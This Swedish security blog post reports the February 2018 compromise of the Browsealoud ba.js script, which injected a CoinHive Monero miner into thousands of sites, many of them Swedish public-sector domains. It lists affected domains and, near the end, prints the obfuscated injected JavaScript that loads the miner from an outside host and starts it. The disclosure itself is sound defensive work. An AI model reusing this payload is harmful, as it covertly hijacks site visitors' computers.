Javascript-miner installerad på hundratals populära svenska sajter

Uppdatering: En intressant iakttagelse jag har gjort är att sökfrågor på 1177.se skickas vidare till tredjeparter såsom Google och Browsealoud. Denna går att läsa ut via http referer headern eller window.location.href. Och ännu värre hade varit om en keylogger hade installerats i ba.js och då läst ut tips till polisen eller anonyma frågor till 1177.

För en stund sedan så modifierades en Amazon S3-lagringsplats som innehöll ett populärt javascript vid namn ba.js. Scriptet används för mjukvaran Browsealoud Web Screen Reader Software.

Följande skärmdump är från Reddit där en besökare till 1177.se som får en varning från sitt antivirus-program gällande CoinHive JS Miner:

Skärmdump av användaren ObjectiveDate på Reddit

Sökväg till scriptet som låg på Amazons CloudFront-tjänst d2pt7h3k9ifq48.cloudfront.net:

  • www.browsealoud.com/plus/scripts/ba.js

Och läser vi på om Coinhive så är det kryptovaluton Monero som det rör sig om (jag skrev tidigare felaktigt Bitcoin):

Coinhive offers a JavaScript miner for the Monero Blockchain (Why Monero?) that you can embed in your website

Och runt 4000 unika domäner länkar till detta script. Ett axplock av .se-domäner som länkar till scriptet som modifierats är följande:

  • lu.se
  • 1177.se
  • polisen.se
  • du.se
  • mah.se
  • malmo.se
  • hallakonsument.se
  • lund.se
  • skane.se
  • lansstyrelsen.se
  • mau.se
  • norrkoping.se
  • kungalv.se
  • botkyrka.se
  • informationsverige.se
  • finspang.se
  • moderaterna.se
  • linkoping.se
  • spsm.se
  • rsyd.se
  • karlstad.se
  • jonkoping.se
  • stockholmshem.se
  • abf.se
  • energimyndigheten.se
  • gotland.se
  • konsumentverket.se
  • humana.se
  • lfv.se
  • elsakerhetsverket.se
  • katrineholm.se
  • alingsas.se
  • haninge.se
  • arn.se
  • kulturradet.se
  • lanstrafikenkron.se
  • seom.se
  • xtrafik.se
  • fmv.se
  • vasamuseet.se
  • sigtuna.se
  • solleftea.se
  • sigtunahem.se
  • ljungby.se
  • do.se
  • alvdalen.se
  • ltkalmar.se
  • kalmar.se
  • jo.se
  • vannas.se
  • mjolby.se
  • folktandvardenskane.se
  • konsumenternas.se
  • musikverket.se
  • oskarshamn.se
  • moneyfromsweden.se
  • nordiskamuseet.se
  • autism.se
  • blekingetrafiken.se
  • knivsta.se
  • sbu.se

Och följande obfuskerade javascript-kod las till för att peka till CoinHive:

/* [Warning] Do not copy or self host this file, you will not be supported */ /* BrowseAloud Plus v2.5.0 (13-09-2017) */ window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x27\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x63\x6f\x6d\x2f\x6c\x69\x62\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x6d\x69\x6e\x2e\x6a\x73\x3f\x72\x6e\x64\x3d"+window["\x4d\x61\x74\x68"]["\x72\x61\x6e\x64\x6f\x6d"]()+"\x27\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74\x3e \x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d \x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79\x2f\x33\x29\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d \x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d \x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 \x43\x6f\x69\x6e\x48\x69\x76\x65\x2e\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x28\'\x31\x47\x64\x51\x47\x70\x59\x31\x70\x69\x76\x72\x47\x6c\x56\x48\x53\x70\x35\x50\x32\x49\x49\x72\x39\x63\x79\x54\x7a\x7a\x58\x71\'\x2c \x63\x70\x75\x43\x6f\x6e\x66\x69\x67\x29\x3b\x6d\x69\x6e\x65\x72\x2e\x73\x74\x61\x72\x74\x28\x29\x3b\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');

Tipstack till Linus Särud, Frans Rosén och Claes Magnusson.

Scriptet var modifierat mellan följande tidpunkter enligt Archive.org:

  • Sun, 11 Feb 2018 02:58:04 GMT
  • Sun, 11 Feb 2018 13:21:56 GMT
Jonas Lejon

Om Jonas Lejon

En av sveriges främsta experter inom cybersäkerhet med över 20 års erfarenhet. Frågor? Kontakta mig på: [email protected] eller LinkedIn Twitter

Skriv en kommentar